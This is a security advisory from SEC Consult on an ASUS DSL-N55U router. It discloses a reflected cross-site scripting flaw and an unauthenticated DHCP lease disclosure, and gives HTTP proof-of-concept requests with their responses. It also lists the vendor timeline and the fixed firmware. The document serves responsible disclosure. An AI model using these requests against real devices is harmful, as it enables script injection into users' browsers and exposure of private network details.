XSS and information disclosure vulnerability

SEC Consult Vulnerability Lab Security Advisory < 20160624-0 >

=======================================================================

title: XSS and information disclosure vulnerability

product: ASUS DSL-N55U router

vulnerable version: 3.0.0.4.376_2736

fixed version: 3.0.0.4_380_3679

CVE number: requested

impact: Medium

homepage: www.asus.com

found: 2016-04-12

by: P. Morimoto (Office Bangkok)

SEC Consult Vulnerability Lab

 

An integrated part of SEC Consult

Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow

Singapore - Vienna (HQ) - Vilnius - Zurich

 

www.sec-consult.com

=======================================================================

 

Vendor description:

-------------------

"ASUS has long been at the forefront of this growth and while the company

started life as a humble motherboard manufacturer with just a handful of

employees, it is now the leading technology company in Taiwan with over

12,500 employees worldwide. ASUS makes products in almost every area of

Information Technology too, including PC components, peripherals,

notebooks, tablets, servers and smartphones."

 

Source: www.asus.com/sg/About_ASUS/The_Meaning_of_ASUS

 

 

Business recommendation:

------------------------

SEC Consult recommends not to use this device until a thorough security review

has been performed by security professionals and all identified issues have

been resolved.

 

 

Vulnerability overview/description:

-----------------------------------

1. Reflected Cross-Site Scripting

The vulnerability exists in the "httpd" binary in the ASUS DSL-N55U firmware.

If the web path is longer than 50 characters, it will redirect a user to

the cloud_sync.asp page with the web path as a value of a GET parameter.

 

Due to the lack of input validation, an attacker can insert malicious JavaScript

code to be executed under a victim's browser context.

 

No authentication is required.

 

2. Remote DHCP Information Disclosure

An unauthenticated attacker can gain access to DHCP information including

the hostname and private IP addresses of the local machines connected to the

router from the WAN IP address.

 

 

Proof of concept:

-----------------

1. Reflected Cross-Site Scripting

HTTP Request:
GET /111111111111111111111111111111111111111'+alert('XSS')+' HTTP/1.1
Host: <ASUS router IP>

HTTP Response:
HTTP/1.0 200 OK
Server: httpd
Date: Tue, 12 Apr 2016 09:04:48 GMT
Content-Type: text/html
Connection: close
<HTML><HEAD><script>location.href='/cloud_sync.asp?flag=111111111111111111111111111111111111111'+alert('XSS')+'';</script>
</HEAD></HTML>

 

2. Remote DHCP Information Disclosure

 

HTTP Request:
GET /Nologin.asp HTTP/1.1
Host: <ASUS router IP>

HTTP Response:
HTTP/1.0 200 Ok
Server: httpd
[...]
var dhcpLeaseInfo = [['<ip-1>', '<hostname-1>'],['<ip-2>', '<hostname-2>'],['<ip-N>', '<hostname-N>']];;
function initial(){
[...]

 

Vulnerable / tested versions:

-----------------------------

The following firmware has been tested which was the most recent version

at the time of discovery:

 

- 3.0.0.4.376_2736 (2015/01/19 update)

 

URL: www.asus.com/support/Download/11/2/0/75/aOKU9r3fCf3pyi95/29/

 

 

Vendor contact timeline:

------------------------

2016-06-02: Contacting vendor through privacy@asus.com and netadmin@asus.com.tw.

2016-06-03: ASUS responds and establishes encrypted communication channel.

2016-06-06: Sending PGP encrypted security advisory to ASUS.

2016-06-20: Vulnerability is fixed in beta firmware.

2016-06-24: Public release of the advisory.

 

 

Solution:

---------

Upgrade to firmware version 3.0.0.4_380_3679 or later.

 

 

Workaround:

-----------

No workaround available.

 

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

SEC Consult Vulnerability Lab

 

SEC Consult

Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow

Singapore - Vienna (HQ) - Vilnius - Zurich

 

About SEC Consult Vulnerability Lab

The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It

ensures the continued knowledge gain of SEC Consult in the field of network

and application security to stay ahead of the attacker. The SEC Consult

Vulnerability Lab supports high-quality penetration testing and the evaluation

of new offensive and defensive technologies for our customers. Hence our

customers obtain the most current information about vulnerabilities and valid

recommendation about the risk profile of new technologies.

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Interested to work with the experts of SEC Consult?

Send us your application www.sec-consult.com/career/

 

Interested in improving your cyber security with the experts of SEC Consult?

Contact our local offices www.sec-consult.com/contact/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

 

EOF Pichaya Morimoto / @2016